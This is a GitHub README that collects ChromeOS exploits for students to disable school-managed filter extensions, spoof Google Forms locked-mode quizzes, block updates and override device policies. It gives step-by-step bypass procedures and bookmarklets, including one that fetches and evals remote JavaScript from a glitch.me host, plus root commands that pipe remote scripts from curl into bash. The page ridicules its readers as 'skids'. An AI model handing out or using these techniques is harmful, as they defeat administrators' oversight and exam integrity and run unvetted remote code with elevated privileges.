javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()

Website/HTML Version (for blocked bookmarklets)

LoMoH HTML Additional Notes: You must create your link with the button on the page for locked mode to work within your organization/district. If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.

GitHub Repository

๐Ÿ”ผ Back to top

LTMEAT Disable extensions

Literally The Meatiest Exploit of All Time

  1. Find a page belonging to the extension you want to disable. chrome://extensions, chrome://extensions-internals, and chrome://process-internals are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhereblahblah/manifest.json

For some filters like Securly, the block screen is already an extension page.

  1. Bookmark the extension page (bookmark A) if you wish. Then, bookmark chrome://kill (B) and chrome://hang (C).
  2. On the extension page (A), click the chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.
  3. Instantly start spamming chrome://hang (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl+R). You should have reloaded within one or two seconds of killing the page.
  4. If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.

Exploit made by Bypassi#7037, learn why this works.

"Help me! I'm an idiot!"

I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions.

How do I get an extension ID?

Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.

It says blocked by client?

That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (ERR_BLOCKED_BY_CLIENT) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).

If you got this because you tried to visit the extension_id_here example URL, you should be extremely ashamed of yourself. Please change and grow as a person.

I don't have a bookmarks bar!!!!

First, try running ctrl+shift+B. If that doesn't work, go to chrome://settings and turn on the "home button" feature, then set it to chrome://hang. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.

There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.

I disabled an extension, but now I can't load websites!

If you just read the write-up, you'd know this would happen if the extension's background page loaded and its listeners were already initialized before you used chrome://hang. You can double-check whether the extension is listening using chrome://extensions-internals, assuming you have a few brain cells in your head.

Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)

image

The bookmarks don't do anything when I click them!

Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.

I disabled the extension. Why is some stuff still blocked?

I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.

Baby method for slow people

๐Ÿ”ผ Back to top

LTMEAT Flood Freeze extensions

  1. Create a bookmark folder and paste the extension page many times. (About 800 minimum is recommended, assuming your Chromebook is average school quality) You should add the extension page at the beginning of the folder.
  2. Right-click and open all in a new window.
  3. Close the window with all those tabs.
  4. Open the folder in a new window again, and Chrome should hang those tabs to take care of the old ones in the background that were just closed. (Equivalent to the duplicate tab step in Bypassi's method)
  5. Flip the Allow access to file URLs switch in the extension settings, and then you've bypassed the patch, and the exploit is working.

Close everything and you're good to go. If it didn't work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!

Not working? Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.

๐Ÿ”ผ Back to top

Temp TMEAT Freeze extensions

A method of using LTMEAT that does not require chrome:// URLs. This works by using 80-150 tabs to soak up memory.

  1. Create a bookmark with the link chrome://extensions/?id=extension_id_here and name it Kill switch.
  2. Create a new bookmark folder. Name it spam.js. Next, paste this link into your browser: chrome-extension://extension_id_here/background.js
  3. Then right-click on your folder and hit Add Page. Press Enter.
  4. Right-click on the folder again and hit Bookmark Manager. You should see your page. Click on it and hit Ctrl+C. Press Ctrl+V until you have 38 of them.
  5. Go to a new tab and right-click your folder. Press Open All (38).
  6. Repeat step 3, then click on one of the tabs from this batch. Wait until the This page is taking too long popup appears. This will take 30-60 seconds. If it doesnโ€™t, do chrome://restart and go back to step 2. Add 3-4 more pages to the folder.
  7. Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit Duplicate. Then, go to your Kill switch bookmark and look for a switch to flip, Allow Access to File://URLs. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click Close all tabs to the right. KEEP THIS TAB OPEN!!!

Tips: Go to chrome://settings/performance and turn Memory Saver off, and in the box where it says Keep these sites always active, paste in the extension URL. Iโ€™ve noticed clicking on one of the tabs from the second batch seems to help with reliability.

๐Ÿ”ผ Back to top

Baby LTMEAT Freeze extensions

BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.

  1. Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.
  2. Visit that chrome-extension://extension_id_here page, then type chrome://hang in the URL bar of that tab. It should start loading infinitely.
  3. Right-click the tab and duplicate it. Don't close anything.
  4. Go to the chrome://extensions page for the blocker extension you want to Disable.
  5. If that page has any switch, such as Allow access to file URLs, click that switch. If you don't see any clickable switches, this exploit will not work
  6. The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.

๐Ÿ”ผ Back to top

LTMEAT Print Freeze extensions

  1. Find your extension's largest file. This can usually be found by using Rob Wu's crxviewer
  2. Go to that page and run Ctrl+P. A print window should show up, with several pages in the top right.
  3. Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.
  4. Reload. The page should start hanging.
  5. Go to your extension's settings page, chrome://extensions.
  6. Duplicate your "printing" tab, and go back to your extension's settings page.
  7. Flip any switch you can find there. Usually, there'll be one titled Allow access to file URLs.

Where do I find my extension's manifest.json?

First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top.

Where do I find my extension ID

Then go to chrome-extension://extension_id_here/manifest.json

Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.

๐Ÿ”ผ Back to top

Dextensify Freeze extensions

Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.

Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html

Download mirror: ftp.3kh0.net

Made by ading2210

๐Ÿ”ผ Back to top

JPCMG LTBEEF w/ Service workers

Requirements

  • chrome://serviceworker-internals
  • Inspect element
  1. Go to chrome://serviceworker-internals
  2. Find your extension, this exploit will not work if you can't find it. Some extensions will not work with this exploit.
  3. Hit the start button then the Inspect button, and execute the LTBEEF code
chrome.management.setEnabled('extension_id_here',false)

Screenshot example

Thanks to Nyaann#3881 for this exploit

๐Ÿ”ผ Back to top

Corkey Corrupt extensions

Corkey does indeed include power washing the Chromebook, which wipes local data including everything under "My files," so I suggest you select everything you want to drag and back up to Google Drive if that's available for your account.

  1. Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.
  2. Log into your Chromebook and immediately turn off WiFi and do refresh+power to instant-restart.
  3. Log back into your Chromebook with the WiFi off. Look for an option to log in as an existing user and click that.
  4. Go to chrome://extensions, turn on WiFi, and wait for your school's blocking extension to appear.
  5. As soon as it appears, turn off WiFi and restart as fast as possible.
  6. Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back.)
  7. If it didn't work, start over. You have to be fast.

๐Ÿ”ผ Back to top

Extension Launcher Install extensions w/o allowlist

A bookmarklet capable of installing extensions, for those without an allowlist.

Requirements

  1. Access to the Chrome Web Store
  2. A Chromebook without allowlist
  3. Bookmarklets enabled

Instructions

  1. Go to ext-launcher-bookmarklet.js and save the code as a bookmarklet.
  2. Go to The Chrome Webstore and use the bookmarklet
  3. Then put the icon of the extension, the ID, and the name of it (This does not matter, you can put anything), then press download, and it will work.

Extra Notes

  • This will not work if you have a blocklist, this is only for extensions that aren't on the allowlist
  • Credit to "Aka, but nice" on Discord.

๐Ÿ”ผ Back to top

Point-Blank Execute scripts on extension pages

This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.

Requirements

  1. Bookmarklets enabled
  2. Access to a working brain

Getting started

  1. Go to newpointblank.js and save the code as a bookmarklet on your Chromebook.
  2. Now find your blocker from the list below.

Blockers

Securly

Go to this page

If it says blocked by Chrome, reload (you have to actually have Securly ofc)

iBoss

Go to this page

Cisco Umbrella

Go to this page

Blocksi

Go to this page

GoGuardian

Go to this page

If your school updated GoGuardian, this exploit may not work.

Extra Notes

  • Now most of these links are a block page (this is intentional)
  • Each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made
  • Click either hard disable or soft disable, soft disable will only disable it until you restart your Chromebook.
  • You can also run some of the scripts and run your own code, your extension may disable javascript running on it, so running your own code may not work.
  • I recommend doing soft disable, which only disables it until restart.
  • The idea was from Bypassi#7037

๐Ÿ”ผ Back to top

UBoss Tamper with IBoss

This works only for iBoss, and Blocksi, If you don't have one of these, use New Point Blank.

Requirements

  • Bookmarklets enabled
  • Access to a working brain

Getting started

  1. Go to the corresponding link for your blocker below.

iBoss: tinyurl.com/byeswamp

Blocksi: tinyurl.com/blockboss

Then bookmark the code below:

javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
  1. Then go to the site with your blocker that was listed above.
  2. Run the code. Follow the instructions there.

If it doesn't work let us know by creating a discussion, this was made in partnership with akabutnice and bypassi.

๐Ÿ”ผ Back to top

CAUB Prevent Updates

This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.

Note

Do NOT leave your Chromebook on a new WiFi network for more then a day without redoing the process unless you also have CAUB Flags. Even if you do have both, it can't hurt to be safe when taking your chromebook somewhere new.

Requirements

  • Access to chrome://network#state

Getting started

  1. Go to chrome://network#state.
  2. Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.
  3. Click the + sign next to the WiFi name of each network that you commonly connect your Chromebook to.
  4. We are going to make it so that when the Chromebook is connected to those networks, it will not check for updates.
  5. Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
  6. Go to caub.glitch.me.
  7. Paste the copied text into the textbox below.
  8. Press the generate onc button below the textbox.
  9. Once you have downloaded the file, go to chrome://network#general.
  10. Click on the import ONC button.
  11. Import the newly-downloaded file.

Extra notes

  • Your Chromebook will no longer automatically update. (as long as you are on a wifi that you CAUBed)
  • Be careful not to stay on wifi for too long without using CAUB on it, otherwise, you might update.
  • We cannot guarantee that this will work on every wifi, but it should work on most.

๐Ÿ”ผ Back to top

CAUB Flags Prevent Updates

This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.

Requirements

  • Access to chrome://flags

Getting started

  1. Go to chrome://flags#show-metered-toggle or search "metered" in chrome://flags instead.
  2. Enable it and restart your device.
  3. Open the Settings app.
  4. Go to your Network >> Advanced >> Show metered toggle and turn it on

Extra notes

  • Your Chromebook will no longer automatically update. (as long as you have the flag enabled)
  • And you must be able to enable flags if it ain't blocked otherwise, this exploit won't work

๐Ÿ”ผ Back to top

Blank3r

Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.

Requirements

  • Bookmarklets enabled

Getting started

  1. Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
  1. Navigate to chrome://extensions.
  2. Click on an extension that YOU installed from the Chrome Web Store > Details.
  3. In the URL bar, copy the string of letters and numbers after the /?id=.
  4. Click "View in Chrome Web Store" and spam the escape key. If it loads into Chrome Webstore try again, if it is a blank screen click the bookmarklet.
  5. Paste the ID of the extension into the prompt separated by commas.

If you close the tab, the exploit will stop working.

๐Ÿ”ผ Back to top

Downgrading Change versions

Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.

Please do note that depending on your kernver= you may not be able to downgrade to certain versions. More info can be found at the Finding Kernver section.

Requirements

  • A USB thumb drive with at least 8GB of storage, however 16GB (or more) is recommended.
  • A personal computer with access to downloading the Chromebook Recovery Utility.

Setup

  1. Navigate to chrome://version on the Chromebook you wish to downgrade. If that is blocked try chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION, and check for your board under Platform. For me, that would be octopus.

chrome://version

  1. Navigate to chrome100.dev , press ctrl+f and type in your board.
  2. Find and download the Chrome version you want to your personal computer.

Downgrading

  1. Install Chromebook Recovery Utility onto your personal computer.
  2. Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".
  3. Select the recovery image you downloaded from chrome100.
  4. Plug in the USB you wish to use, and follow the prompts on the screen.
  5. On your Chromebook, press esc+reload+power and follow the prompts.
  6. On the checking for updates screen or Wi-Fi selection screen, press ctrl+alt+e to skip the "checking for updates" screen.

๐Ÿ”ผ Back to top

Pollen Policy Editor

chromeOS User Policy Editor

Requirements

  • Devmode NEEDS to be enabled.

Getting started

There are two modes for this, I recommend just using the first one.

Normal

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
  1. Done! It may take a few seconds for the new policy to apply. If it does not apply, press alt+vol_up+x.

PollenFS (RootFS)

Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.

  1. Open Crosh (Ctrl+Alt+T)
  2. Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
  1. Reboot
  2. Go Through Steps 1-3 Again
  3. Run the following command:
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
  1. Done! Your Pollen configuration is now permanently applied!

Further Reading

๐Ÿ”ผ Back to top

Killcurly Break extensions

Kill extensions by signing out.

  1. Visit chrome://settings/signOut.
  2. If you are on the right version, there should be a big blue button. Press it.
  3. Open a new tab and type in chrome://restart, then press enter.
  4. Now visit tinyurl.com/AddSession or this link.
  5. Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, YouTube, and any Google service.

All of your extensions should stop working. Note that you must repeat this every time you restart or sign out.

This exploit is patched on Chrome versions 112 and above. Credit to Zoroark

๐Ÿ”ผ Back to top

Shimboot Boot Linux

Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.

For more detailed information, please see the project's README.

Credit to vk6 for this exploit

Further reading

๐Ÿ”ผ Back to top

uBlock Run Run Code On Pages

Note

Google is deprecating mv2, so uBlock will not work as of Oct 24, and will be fully removed for enterprise as well in June 25. More info here

If your school allows the uBlock Origin Chrome extension, you can run bookmarklets with the extension.

Requirements

  • uBlock Origin

Getting started

  1. Make sure you have uBlock Origin installed.
  2. Go to the extension's settings.
  3. Under the settings tab, check the "I am an advanced user" box, then click on the small cog icon.
  4. Find userResourcesLocation and change it from unset to https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js.
  5. Go to the filters tab of the settings and add the following line:
*##+js(execute_script.js)
  1. Now press ctr+alt+tilde (~) to run code on the current page
  2. Have fun!

๐Ÿ”ผ Back to top

uRun - Bypass bookmarklet restrictions with uBlock

Note

Google is deprecating mv2, so uBlock will not work as of Oct 24, and will be fully removed for enterprise as well in June 25. More info here

From Inglan2

Recently Google cracked down on bookmarklets and now they don't work (It's based on the DeveloperToolsAvailability policy). I wanted to run scripts still so I started making this, inspired by uBlock Run Run Code On Pages, but with more features, like saving scripts.

  1. Open uBlock settings
  2. Enable advanced settings, and click the gear โš™๏ธ button

Caution

DO NOT MODIFY ANYTHING ELSE ON THIS PAGE UNLESS YOU KNOW WHAT YOU ARE DOING (you probably don't), AS YOU COULD BREAK SOMETHING.

Tip

If you mess up, go to the home of settings and at the bottom click reset to default settings

  1. Add the script

Change

userResourcesLocation unset

to

userResourcesLocation https://inglan2.github.io/uRun/urun.js

Tip

It's down the bottom

  1. Set a filter to load uRun

After closing the advanced settings tab, go to the filters tab and add this:

*##+js(urun.js)

Usage

Simply press Ctrl + Shift + ` to open the menu and from there you can run and create scripts. To add a script, press the โž• button up the top right, and enter the code you would like to add (without the javascript: part).

๐Ÿ”ผ Back to top

Quick View Bypass extensions

Requirements

  • Bookmarklets enabled

QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.

Go to quickview-exploit.pages.dev and follow the instructions.

Further reading

๐Ÿ”ผ Back to top

Buypass Bypass extensions

What it can and can't do

  • This only lasts for 3 minutes!
  • Pages visited in this window will not be saved to your history, but their cookies will be saved.
  • You can right-click on the window to go back and forward.
  • There's no good way to make the text in the window larger.
  • This won't bypass network filters.
  • You can't log into non-school accounts.
  • It's completely possible that some filters could read and block the data sent within the window.

Getting started

Visit any of the links below:

Further reading

๐Ÿ”ผ Back to top

Chaos Hapara bypass

DevTools must not be allowed by policy to perform this exploit.

Go to this link and follow the instructions.

Further Reading:

๐Ÿ”ผ Back to top

SOT Exploit Open URLs in OneTab

  1. If you do not already have OneTab installed, try to.
  2. Click the import button in the settings tab.
  3. Copy-paste the URL you wish to visit about 100 times, and then click import.
  4. Spam click the top link, then either spam escape on one of them or wait for one to load on a about:blank page.

Credit to Coding4Hours

๐Ÿ”ผ Back to top

GoGuardian GoAway GoGuardian bypass

THIS EXPLOIT WILL NOT WORK FOR YOU IF YOU HAVE ANY EXTENSION BESIDES GOGUARDIAN

Getting Started

  1. Obviously (but still needs to be said due to skids), make sure GoGuardian is actually installed
  2. Visit the attached URL in a new tab
  3. On that tab there will be a simple white screen with nothing on it, reload the page
  4. If the GET request fails and you are left on an error screen (don't panic, this is intended, continue)
  5. Visit `chrome://restart`` to clear cached sites from GoGuardian

Credit to akabutnice

๐Ÿ”ผ Back to top

Microsoft Labs Virtualbox but it got 20 doses of the COVID Vaccine

Thanks a bunch Bill Gates

Do this! Not drugs!

  1. Go to this website Microsoft Labs
  2. Click the button that says "Sign in to launch VM mode."
  3. Holy guacamole! You need a Microsoft Account! Use your credentials and sign in.
  4. Load the virtual machine by clicking the button or if you sign it it will redirect you to it automatically.
  5. The password is pass@word1.
  6. Load in and profit!

NOTE: Sound doesn't work and a lot of websites are blocked, but it's just fun to screw around with.

(Not really) credit to mundaneunblocking

๐Ÿ”ผ Back to top

About

A curated list of exploits for ChromeOS

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 69.1%
  • HTML 30.9%